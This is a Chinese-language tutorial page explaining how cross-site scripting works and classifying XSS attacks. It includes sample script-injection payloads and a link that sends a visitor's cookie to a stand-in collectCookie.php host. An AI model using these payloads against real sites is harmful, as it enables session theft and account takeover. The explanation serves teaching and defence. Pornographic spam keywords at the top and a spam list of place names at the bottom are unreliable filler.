国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 學院 > 安全知識 > 正文

XSS攻擊的原理

2020-07-05 18:02:35
字體:
來源:轉載
供稿:網友

概念說明

Xss(cross-site scripting)攻擊指的是攻擊者往Web頁面里插入惡意html標簽或者javascript代碼,當用戶瀏覽該頁或者進行某些操作時,攻擊者利用用戶對原網站的信任,誘騙用戶或瀏覽器執行一些不安全的操作或者向其它網站提交用戶的私密信息。

比如:攻擊者在論壇中放一個看似安全的鏈接,騙取用戶點擊后,竊取cookie中的用戶私密信息;或者攻擊者在論壇中加一個惡意表單,當用戶提交表單的時候,卻把信息傳送到攻擊者的服務器中,而不是用戶原本以為的信任站點。

諸如此類,唯一能完全杜絕xss攻擊的方法,就是禁用script,img等,顯然這是不靠譜的,用戶需要豐富的頁面內容;當然我們可以用一些方法預防xss攻擊,盡量減少xss造成的危害。

盜取各類用戶帳號,如機器登錄帳號、用戶網銀帳號、各類管理員帳號

控制企業數據,包括讀取、篡改、添加、刪除企業敏感數據的能力

盜竊企業重要的具有商業價值的資料

非法轉賬

強制發送電子郵件

網站掛馬

控制受害者機器向其它網站發起攻擊

舉例:

<body background=”javascript:alert(‘xss – gotcha!’)”>

<iframe src=javascript:alert(‘xss – gotcha!’)></iframe>

> </body><body onload=”a();”><script>function a(){alert(‘xss -gotcha!’);}</script>< ”

xss攻擊分類

分類方法一

xss攻擊分為兩類:從其它站點到應用站點的攻擊、從應用站點到同站或其它站點的攻擊

從其它站點到應用站點的攻擊:故名思義,這種攻擊是由外部發起的,來自email或其它站點。這種攻擊在用戶點擊鏈接,下載圖片或者提交表單的時候,對應用網站進行了意想之外的操作。

通常用戶登錄后會得到一個可用session,xss攻擊者可以利用這個session,越過用戶驗證,進行一些不安全的操作,如下:

<a href = “http://www.abc.com/submit.php?subject = I%20am%20owned” >Check it out!

通過這個鏈接,只要用戶登錄了,就會發送一個subject,即使在其它網站上。

正因如此,一般的郵箱客戶端不會自動從不信任的網站上加載圖片(因為考慮到可以通過img的src屬性向第三方站點發送GET請求);另外,可以設置session的過期時間,讓session自動失效。

從應用站點到同站或其它站點的攻擊:這種攻擊,通常是攻擊者在應用站點上通過發表評論,或者其它方式嵌入代碼,當用戶加載頁面或者點擊鏈接就會產生一些意想之外的操作。 如下:

<a href=”#” onmouSEOver = “window.location = ‘http://abc.com/collectCookie.php?cookie = + document cookie.escape();” >Check it out!</a> 當用戶滑過鏈接,就會將cookie信息發到攻擊者的服務器上。

分類方法二

xss的另一種分類方法(個人感覺更清楚),將xss攻擊分為三種,

類型A,本地利用漏洞,這種漏洞存在于頁面中客戶端腳本自身。

其攻擊過程如下:

Alice給Bob發送一個惡意構造了Web的URL。

Bob點擊并查看了這個URL。

惡意頁面中的JavaScript打開一個具有漏洞的HTML頁面并將其安裝在Bob電腦上。

具有漏洞的HTML頁面包含了在Bob電腦本地域執行的JavaScript。

Alice的惡意腳本可以在Bob的電腦上執行Bob所持有的權限下的命令。

類型B

反射式漏洞,這種漏洞和類型A有些類似,不同的是Web客戶端使用Server端腳本生成頁面為用戶提供數據時,如果未經驗證的用戶數據被包含在頁面中而未經HTML實體編碼,客戶端代碼便能夠注入到動態頁面中。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 泗洪县| 浦江县| 四子王旗| 精河县| 珲春市| 江陵县| 温泉县| 林西县| 甘泉县| 苍山县| 南澳县| 买车| 新野县| 遂昌县| 尉氏县| 邵东县| 开远市| 宁强县| 石渠县| 阳谷县| 上犹县| 体育| 广东省| 德钦县| 邵东县| 庆阳市| 海原县| 博兴县| 桦甸市| 邵东县| 缙云县| 醴陵市| 濮阳市| 大田县| 汤原县| 阜新| 鹤岗市| 蕲春县| 武隆县| 万载县| 金堂县|